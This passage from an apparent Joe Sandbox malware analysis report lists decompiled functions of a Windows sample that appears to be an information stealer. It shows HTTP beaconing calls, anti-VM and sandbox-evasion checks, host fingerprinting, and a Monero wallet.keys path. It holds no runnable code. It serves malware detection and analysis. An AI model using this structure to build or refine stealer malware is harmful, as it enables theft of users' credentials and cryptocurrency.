                          • GetProcAddress.KERNEL32(6FE30000,01895568), ref: 00B0A6CD
                          • GetProcAddress.KERNEL32(6FE30000,018ADA48), ref: 00B0A6E5
                          • GetProcAddress.KERNEL32(6FE30000,018AD958), ref: 00B0A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 3360c76d67ae0827feb1c9cec8575d294bb5c68cc4072c35adf4df20818aa681
                          • Instruction ID: e88f771bba069bbb65ce81736fb39b478fd5a3737ea19c584196a87be00d832c
                          • Opcode Fuzzy Hash: 3360c76d67ae0827feb1c9cec8575d294bb5c68cc4072c35adf4df20818aa681
                          • Instruction Fuzzy Hash: 4262F7B6704300AFC344DFADED88D663BF9F79C701718851AA689C3364D679A842DB72
                          Function 00AF6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 af6280-af630b call b0a7a0 call af47b0 call b0a740 InternetOpenA StrCmpCA 1040 af630d 1033->1040 1041 af6314-af6318 1033->1041 1040->1041 1042 af631e-af6342 InternetConnectA 1041->1042 1043 af6509-af6525 call b0a7a0 call b0a800 * 2 1041->1043 1045 af64ff-af6503 InternetCloseHandle 1042->1045 1046 af6348-af634c 1042->1046 1062 af6528-af652d 1043->1062 1045->1043 1048 af634e-af6358 1046->1048 1049 af635a 1046->1049 1051 af6364-af6392 HttpOpenRequestA 1048->1051 1049->1051 1053 af6398-af639c 1051->1053 1054 af64f5-af64f9 InternetCloseHandle 1051->1054 1055 af639e-af63bf InternetSetOptionA 1053->1055 1056 af63c5-af6405 HttpSendRequestA HttpQueryInfoA 1053->1056 1054->1045 1055->1056 1058 af642c-af644b call b08940 1056->1058 1059 af6407-af6427 call b0a740 call b0a800 * 2 1056->1059 1067 af644d-af6454 1058->1067 1068 af64c9-af64e9 call b0a740 call b0a800 * 2 1058->1068 1059->1062 1071 af64c7-af64ef InternetCloseHandle 1067->1071 1072 af6456-af6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 af648b 1072->1076 1077 af6482-af6489 1072->1077 1076->1071 1077->1076 1080 af648d-af64c5 call b0a9b0 call b0a8a0 call b0a800 1077->1080 1080->1072
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AF63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AF646D
                          • InternetCloseHandle.WININET(00000000), ref: 00AF64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00AF64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00AF6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 0271d7b4cd74067f19f5d435a3eb98221ba763133f6c7c59ecdb632d61c0f362
                          • Instruction ID: b985d29fc0862fbce8d0b2c7b07b240c58f39cccbb2f78cafb7accb817e94c73
                          • Opcode Fuzzy Hash: 0271d7b4cd74067f19f5d435a3eb98221ba763133f6c7c59ecdb632d61c0f362
                          • Instruction Fuzzy Hash: 54711D71A00318ABDB14EFE4DC49FEE77B8AB44701F108599F609AB2D0DBB46A85CF51
                          Function 00B05510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 b05510-b05577 call b05ad0 call b0a820 * 3 call b0a740 * 4 1106 b0557c-b05583 1090->1106 1107 b05585-b055b6 call b0a820 call b0a7a0 call af1590 call b051f0 1106->1107 1108 b055d7-b0564c call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1106->1108 1124 b055bb-b055d2 call b0a8a0 call b0a800 1107->1124 1133 b05693-b056a9 call b0aad0 StrCmpCA 1108->1133 1138 b0564e-b0568e call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1108->1138 1124->1133 1140 b057dc-b05844 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1133->1140 1141 b056af-b056b6 1133->1141 1138->1133 1270 b05ac3-b05ac6 1140->1270 1144 b057da-b0585f call b0aad0 StrCmpCA 1141->1144 1145 b056bc-b056c3 1141->1145 1164 b05991-b059f9 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1144->1164 1165 b05865-b0586c 1144->1165 1149 b056c5-b05719 call b0a820 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1145->1149 1150 b0571e-b05793 call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 b05795-b057d5 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1150->1250 1164->1270 1171 b05872-b05879 1165->1171 1172 b0598f-b05a14 call b0aad0 StrCmpCA 1165->1172 1180 b058d3-b05948 call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1171->1180 1181 b0587b-b058ce call b0a820 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1171->1181 1201 b05a16-b05a21 Sleep 1172->1201 1202 b05a28-b05a91 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1172->1202 1180->1172 1275 b0594a-b0598a call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1180->1275 1181->1172 1201->1106 1202->1270 1250->1144 1275->1172
                          APIs
                            • Part of subcall function 00B0A820: lstrlen.KERNEL32(00AF4F05,?,?,00AF4F05,00B10DDE), ref: 00B0A82B
                            • Part of subcall function 00B0A820: lstrcpy.KERNEL32(00B10DDE,00000000), ref: 00B0A885
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B056A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05857
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00B051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05228
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05318
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B0532F
                            • Part of subcall function 00B052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B05364
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B05383
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B053AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B0578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00B05A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 22d80000f5161789ef571a38b8f94c1db42e08fc1f9d9f85a3f086dc5b749db8
                          • Instruction ID: 5e968d9e6f1439addae1599e09773a4fcb17f7166841ab412e4c3da4d15be1d7
                          • Opcode Fuzzy Hash: 22d80000f5161789ef571a38b8f94c1db42e08fc1f9d9f85a3f086dc5b749db8
                          • Instruction Fuzzy Hash: 02E145719103049ACB14FBA4DD56EFE7BBCAF54300F40C998B506A65D1EF34AE49CBA2
                          Function 00B017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 b017a0-b017cd call b0aad0 StrCmpCA 1304 b017d7-b017f1 call b0aad0 1301->1304 1305 b017cf-b017d1 ExitProcess 1301->1305 1309 b017f4-b017f8 1304->1309 1310 b019c2-b019cd call b0a800 1309->1310 1311 b017fe-b01811 1309->1311 1313 b01817-b0181a 1311->1313 1314 b0199e-b019bd 1311->1314 1316 b01970-b01981 StrCmpCA 1313->1316 1317 b018f1-b01902 StrCmpCA 1313->1317 1318 b01951-b01962 StrCmpCA 1313->1318 1319 b01932-b01943 StrCmpCA 1313->1319 1320 b01913-b01924 StrCmpCA 1313->1320 1321 b01835-b01844 call b0a820 1313->1321 1322 b0185d-b0186e StrCmpCA 1313->1322 1323 b0187f-b01890 StrCmpCA 1313->1323 1324 b01821-b01830 call b0a820 1313->1324 1325 b01849-b01858 call b0a820 1313->1325 1326 b018ad-b018be StrCmpCA 1313->1326 1327 b018cf-b018e0 StrCmpCA 1313->1327 1328 b0198f-b01999 call b0a820 1313->1328 1314->1309 1338 b01983-b01986 1316->1338 1339 b0198d 1316->1339 1329 b01904-b01907 1317->1329 1330 b0190e 1317->1330 1335 b01964-b01967 1318->1335 1336 b0196e 1318->1336 1333 b01945-b01948 1319->1333 1334 b0194f 1319->1334 1331 b01930 1320->1331 1332 b01926-b01929 1320->1332 1321->1314 1344 b01870-b01873 1322->1344 1345 b0187a 1322->1345 1346 b01892-b0189c 1323->1346 1347 b0189e-b018a1 1323->1347 1324->1314 1325->1314 1348 b018c0-b018c3 1326->1348 1349 b018ca 1326->1349 1350 b018e2-b018e5 1327->1350 1351 b018ec 1327->1351 1328->1314 1329->1330 1330->1314 1331->1314 1332->1331 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 b018a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00B017C5
                          • ExitProcess.KERNEL32 ref: 00B017D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 5f27c29710c76597739a09df0185a87e9834c305510adb3b9feb7eeba0075040
                          • Instruction ID: 5ff3481474b7ee3ba768f88fa2043f7446d436a0e3374ecb747f8dc0ba702e29
                          • Opcode Fuzzy Hash: 5f27c29710c76597739a09df0185a87e9834c305510adb3b9feb7eeba0075040
                          • Instruction Fuzzy Hash: FF511074A14209EBCB08DFA8D994ABE7BF5BF44704F108898E805A7290D771D952CB62
                          Function 00B07500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 b07500-b0754a GetWindowsDirectoryA 1357 b07553-b075c7 GetVolumeInformationA call b08d00 * 3 1356->1357 1358 b0754c 1356->1358 1365 b075d8-b075df 1357->1365 1358->1357 1366 b075e1-b075fa call b08d00 1365->1366 1367 b075fc-b07617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 b07628-b07658 wsprintfA call b0a740 1367->1369 1370 b07619-b07626 call b0a740 1367->1370 1377 b0767e-b0768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B07542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B0760A
                          • wsprintfA.USER32 ref: 00B07640
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 33a363fe12427317ac104071315f0dfcda35cd36ca159820c3bbd76578927970
                          • Instruction ID: fda12e449ac538118b80dd483ce154c8c4d7b564bfa03a5ee28909f0b0016175
                          • Opcode Fuzzy Hash: 33a363fe12427317ac104071315f0dfcda35cd36ca159820c3bbd76578927970
                          • Instruction Fuzzy Hash: AB4171B1D44748ABDB10DB98DC85BEEBBB8EB18700F104199F509A72C0DB75AA44CBA5
                          Function 00B069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1698), ref: 00B098A1
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15F0), ref: 00B098BA
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A14E8), ref: 00B098D2
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15D8), ref: 00B098EA
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A16B0), ref: 00B09903
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A8C38), ref: 00B0991B
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895048), ref: 00B09933
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895068), ref: 00B0994C
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A16C8), ref: 00B09964
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1758), ref: 00B0997C
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1650), ref: 00B09995
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1608), ref: 00B099AD
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895248), ref: 00B099C5
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15A8), ref: 00B099DE
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00AF11D0: ExitProcess.KERNEL32 ref: 00AF1211
                            • Part of subcall function 00AF1160: GetSystemInfo.KERNEL32(?), ref: 00AF116A
                            • Part of subcall function 00AF1160: ExitProcess.KERNEL32 ref: 00AF117E
                            • Part of subcall function 00AF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AF112B
                            • Part of subcall function 00AF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AF1132
                            • Part of subcall function 00AF1110: ExitProcess.KERNEL32 ref: 00AF1143
                            • Part of subcall function 00AF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AF123E
                            • Part of subcall function 00AF1220: ExitProcess.KERNEL32 ref: 00AF1294
                            • Part of subcall function 00B06770: GetUserDefaultLangID.KERNEL32 ref: 00B06774
                            • Part of subcall function 00AF1190: ExitProcess.KERNEL32 ref: 00AF11C6
                            • Part of subcall function 00B07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                            • Part of subcall function 00B07850: RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                            • Part of subcall function 00B07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                            • Part of subcall function 00B078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                            • Part of subcall function 00B078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                            • Part of subcall function 00B078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00B06AF9
                          • Sleep.KERNEL32(00001770), ref: 00B06B04
                          • CloseHandle.KERNEL32(?,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06B1A
                          • ExitProcess.KERNEL32 ref: 00B06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: 95be88afb61da1637b3b1da83d5ff934b44449665a563602e8e96e67bb79e10b
                          • Instruction ID: 6b4493829b545af108a94eef09497d092e90f42397aaad58cd08ce4af4868c5a
                          • Opcode Fuzzy Hash: 95be88afb61da1637b3b1da83d5ff934b44449665a563602e8e96e67bb79e10b
                          • Instruction Fuzzy Hash: 5531FE71E10308AADB04FBF0DD56BFE7BB8AF14340F504998F252A61D2DF706945C6A6
                          Function 00B06AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
